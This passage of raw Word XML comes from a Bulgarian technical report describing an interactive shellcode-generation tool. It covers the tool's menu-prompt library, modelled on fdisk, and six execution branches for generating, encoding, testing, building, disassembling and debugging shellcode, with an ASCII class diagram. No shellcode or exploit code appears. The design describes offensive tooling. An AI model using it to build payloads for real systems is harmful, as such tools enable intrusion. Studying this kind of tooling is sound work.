    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Select [1]: 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLERE</w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve">F 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: приемрно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">two's complement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>превръщане</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Целият вход на потребителя е 2 цифри, ентър и цифрата му.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Прототип на тази идея е командният инструмент за манипулация на таблиците за дялове на дискове - fdisk</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="39"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. Негова основна характеристика е структуриране на функционалността под формата на диалози. След първоначален избор на команда, програмата пита потребителя за логически последователна информация, като го води през всеки параметър. Представя се кратко описание на всяка възможност и потребителят избира желаната чрез кратка мнемоника, а където е необходим изричен вход се предоставят стойности по подразбиране. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Инструментът взаимства същността на този метод на потребителски вход, с основната разлика, че вместо мнемоники, потребителят въвежда пореден </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>номер на избора. За реализация се използва библиотечен подход, дефиниран във файла automation/tool_parts/io.py. В него се предоставя централизирана абстракция за реализиране на трите основни типа запитвания по стегнат начин. Запитванията са:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> - прави се запитване за избор на една опция от списък с опции</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>affirm_prompt()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> - изискване на съгласие, като основното му приложение е да паузира изпълнението, за да може потребителят да се запознае със случилото се досега.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="00B4067A" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>nput_field()</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t xml:space="preserve"> - текстов вход от потребителя. Служи основно за параметрите на модулите, например execve може да приема всякакви пътища. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>И трите варианта имат стойности по подразбиране, което позволява на потребителя да се движи през изпълнението с един бутон - enter. Обикновено те са най-използваните стойности и минимален потребителски вход и без изрични промени би бил генериран функционален шелкод.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Този подход за потребителски вход дава възможност той да се обработва само от тук, което позволява гъвкавост за бърза промяна на поведението на цялата програма, провеждане на тестове в бъдеще и реализация на инструмента с аргументи от команден интерпретатор. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_o04f1hf767lf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="133" w:name="_Toc3540802"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Идеята за Branch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Режимите от първата итерация се заменят с “клони” на изпълнение. Реално те капсулират същата функционалност, но представляват логически свързани части от диаграмата на фигурата и са по-ограничени. Всеки клон се грижи за обработката на потребителския вход и изпълнението на съответните операции, съответно, когато изпълнението премине към друг клон, контролът се предава на него. Реализацията на дървовидната структура е тяхна отговорност. Има 6 клона, за справка - приложение ръководството: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GenBranch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Това е главният клон. Той дефинира основната функционалност на целия проект - генерирането на шелкод. Тук се добавят модули, подават им се параметри и се комбинират във финален изход.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>EncodeBranch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Грижи се за кодирането на шелкод. Може да бъде използван самостоятелно, но е тясно свързан с генерирането. Неговите отговорности са много малки, тъй като повечето от функционалностите, от които той зависи, са в клона за генериране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>TestBranch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Много подобен на клона за кодиране. Генерирането на тест е значително по-проста операция от генерирането на шелкод, което опростява работата му. Той няма връзки назад, което го прави краен клон. Това не е толкова функционален избор, колкото логически, тъй като тестването на шелкод е последното нещо, което един потребител би правил. Връщането назад е еквивалентно на повторното пускане на инструмента.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>BuildBranch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Единственият клон, който няма директен вход. Той дори няма инстанционни методи. Неговата задача е да прикрие особеностите на компилацията от другите клони и да предостави единен интерфейс за тези задачи. Тези действия са необходими на другите клони и този клон служи като библиотечен. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Предвидена е поддръжка на множество архитектури, но поради ограниченото време няма истински проверки за тях.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Тази функционалност може лесно да се добави.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>DisassembleBranch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Като отделен входен клон, той само навръзва липсващите части, когато бъде избран като вход. Той е краен клон по същите причини като TestBranch.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>DebugBranch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Последния клон на изпълнение. Той е най-незначим и би могъл да бъде отделен инструмент, но функциите, за които е предназначен, са достатъчно близки, за да са част от инструмента. Той служи като библиотека за кратки действия, които биха били полезни в процеса на дебъгване на един шелкод. Например, ако системна функция излезе с грешка, кодът на грешката се записва </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">в rax като “two’s complement” отрицателна стойност на грешката. Такъв формат е трудно четим, затова в този клон има функция за това преобразование. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_7ukwlcdb682m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="134"/>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               +------------------+            +------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               |    GenBranch     |            |   DebugBranch    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               +------------------+---+    +---+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               |dispatch_module() |   |    |   |    dispatch()    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               |dispatch_encode() |   |    |   |     htons()      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               +------------------+   |    |   +------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      v    v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+------------------+           +------------------+         +------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|   EncodeBranch   |           |       Base       |         |    TestBranch    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+------------------+----------&gt;+------------------+&lt;--------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|dispatch_encode() |           |preview_item()    |         | dispatch_test()  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|  use_encoder()   |           +------------------+         | dispatch_exit()  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+------------------+                  ^    ^                +------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             +------------------+     |    |    +------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             |   BuildBranch    |     |    |    |DisassembleBranch |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             +------------------+-----+    +----+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             |      save()      |               | do_disassemble() |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             |    extract()     |               +------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             |    compile()     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             |  disassemble()   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             +------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00303E70">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
